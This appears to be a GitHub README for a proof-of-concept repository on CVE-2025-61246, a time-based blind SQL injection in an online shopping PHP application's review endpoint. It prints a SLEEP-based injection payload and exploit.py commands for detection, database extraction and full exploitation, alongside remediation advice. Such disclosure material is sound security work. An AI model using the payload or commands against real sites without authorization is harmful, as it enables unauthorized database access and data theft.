# CVE-2025-61246 - SQL Injection Vulnerability in Online Shopping System

![CVE](https://img.shields.io/badge/CVE-2025--61246-critical)
![Severity](https://img.shields.io/badge/Severity-Critical-red)
![CVSS](https://img.shields.io/badge/CVSS-9.8-critical)

## Overview

This repository contains a Proof of Concept (PoC) for **CVE-2025-61246**, a critical SQL Injection vulnerability discovered in the Online Shopping System PHP application. The vulnerability allows an unauthenticated attacker to execute arbitrary SQL commands through time-based blind SQL injection.

## Vulnerability Details

- **CVE ID**: CVE-2025-61246
- **Vulnerability Type**: SQL Injection (Time-Based Blind)
- **Affected Component**: `/online-shopping-system-php-master/review_action.php`
- **Affected Version**: 1.0
- **Vulnerable Parameter**: `proId`
- **Attack Vector**: Network (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- **Severity**: Critical (CVSS Score: 9.8)
- **Discoverer**: Govind Pratap Singh

## Technical Description

The vulnerability exists in the `review_action.php` endpoint where user-supplied input from the `proId` parameter is directly incorporated into SQL queries without proper sanitization or parameterized queries. This allows an attacker to inject malicious SQL payloads that can:

- Extract sensitive database information
- Bypass authentication mechanisms
- Modify or delete database records
- Execute administrative operations

### Vulnerable Code Pattern

```php
// Vulnerable code (example)
$proId = $_POST['proId'];
$query = "SELECT * FROM products WHERE id = " . $proId;
mysqli_query($conn, $query);
```

## Attack Vectors

An attacker can exploit this vulnerability by:

1. Sending a crafted POST request to `/online-shopping-system-php-master/review_action.php`
2. Including a malicious SQL payload in the `proId` parameter
3. Using time-based blind SQL injection techniques to extract data
4. Leveraging the vulnerability to gain unauthorized access to the database

### Example Payload

```
proId=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -
```

## Proof of Concept

This repository includes:

1. **Automated Exploitation Script** (`exploit.py`) - Python script to detect and exploit the vulnerability
2. **Manual Testing Guide** (`MANUAL_TESTING.md`) - Step-by-step instructions for manual exploitation
3. **Vulnerable Application Setup** (`docker-compose.yml`) - Docker environment for safe testing
4. **Remediation Guide** (`REMEDIATION.md`) - Secure coding practices and patches

## Installation & Usage

### Prerequisites

```bash
Python 3.7+
pip install -r requirements.txt
```

### Quick Start

```bash
# Clone the repository
git clone https://github.com/hackergovind/CVE-2025-61246.git
cd CVE-2025-61246

# Install dependencies
pip install -r requirements.txt

# Run the exploit
python exploit.py --url http://target.com/online-shopping-system-php-master/review_action.php
```

### Advanced Usage

```bash
# Detection only (no exploitation)
python exploit.py --url http://target.com/review_action.php --detect-only

# Extract database name
python exploit.py --url http://target.com/review_action.php --extract-db

# Full exploitation with custom timeout
python exploit.py --url http://target.com/review_action.php --timeout 10 --full-exploit

# Use proxy for testing
python exploit.py --url http://target.com/review_action.php --proxy http://127.0.0.1:8080
```

## Impact

Successful exploitation of this vulnerability can lead to:

- **Data Breach**: Extraction of sensitive user information, credentials, and payment data
- **Authentication Bypass**: Unauthorized access to administrative functions
- **Data Manipulation**: Modification or deletion of critical database records
- **Complete System Compromise**: Potential for remote code execution in certain configurations

## Remediation

### Immediate Actions

1. **Apply Input Validation**: Implement strict input validation for all user-supplied data
2. **Use Parameterized Queries**: Replace dynamic SQL with prepared statements
3. **Implement WAF Rules**: Deploy Web Application Firewall rules to block SQL injection attempts
4. **Update Application**: Apply the latest security patches

### Secure Code Example

```php
// Secure implementation using prepared statements
$proId = $_POST['proId'];
$stmt = $conn->prepare("SELECT * FROM products WHERE id = ?");
$stmt->bind_param("i", $proId);
$stmt->execute();
$result = $stmt->get_result();
```

For detailed remediation steps, see [REMEDIATION.md](REMEDIATION.md).

## References

- [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
- [CWE-89: SQL Injection](https://cwe.mitre.org/data/definitions/89.html)

## Disclaimer

⚠️ **IMPORTANT**: This PoC is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal. The author assumes no liability for misuse of this information. Always obtain proper authorization before testing.

## Author

**Govind Pratap Singh**

- GitHub: [@hackergovind](https://github.com/hackergovind)
- Email: govindsinghpratap123@gmail.com
- Medium: https://medium.com/@govindsinghpratap123

## License

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

## Acknowledgments

- MITRE CVE Assignment Team
- OWASP Foundation
- Security Research Community

---

**Responsible Disclosure**: If you discover a security vulnerability, please report it responsibly to the vendor before public disclosure.
